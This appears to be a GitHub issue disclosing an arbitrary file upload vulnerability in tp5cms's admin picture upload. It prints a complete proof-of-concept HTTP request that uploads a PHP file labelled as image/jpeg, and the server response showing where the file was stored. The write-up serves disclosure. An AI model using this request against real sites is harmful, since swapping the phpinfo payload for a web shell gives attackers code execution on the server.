New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

tp5cms In the photo upload function position can upload any type of document #5

Open
langyayue opened this Issue Nov 29, 2018 · 0 comments

Comments

Projects
None yet
1 participant
@langyayue

langyayue commented Nov 29, 2018

tp5cms In the photo upload function position can upload any type of document (including PHP)
In the location of the upload pictures, the type of the image replacement for other types
payload:

POST /tp5cms-master/admin.php/upload/picture.html HTTP/1.1
Host: 192.168.43.15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.43.15/tp5cms-master/admin.php/article/add.html
Content-Length: 792
Content-Type: multipart/form-data; boundary=---------------------------263561600032324
Cookie: PHPSESSID=bpgp1b6kfpl84tdk4lj4mj4q16
Connection: close

-----------------------------263561600032324
Content-Disposition: form-data; name="id"

WU_FILE_0
-----------------------------263561600032324
Content-Disposition: form-data; name="name"

QQ��20181127092936.php
-----------------------------263561600032324
Content-Disposition: form-data; name="type"

image/jpeg
-----------------------------263561600032324
Content-Disposition: form-data; name="lastModifiedDate"

Tue Nov 27 2018 09:29:40 GMT+0800
-----------------------------263561600032324
Content-Disposition: form-data; name="size"

13893
-----------------------------263561600032324
Content-Disposition: form-data; name="file"; filename="QQ��20181127092936.php"
Content-Type: image/jpeg

<?php phpinfo();
-----------------------------263561600032324--

Return :

HTTP/1.1 200 OK
Date: Thu, 29 Nov 2018 09:15:41 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 120
Connection: close
Content-Type: application/json; charset=utf-8

{"path":"\/tp5cms-master\/uploads\/20181129\/712041c64a6f79b10120506a2610987d.php","code":1,"message":"�传���"}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment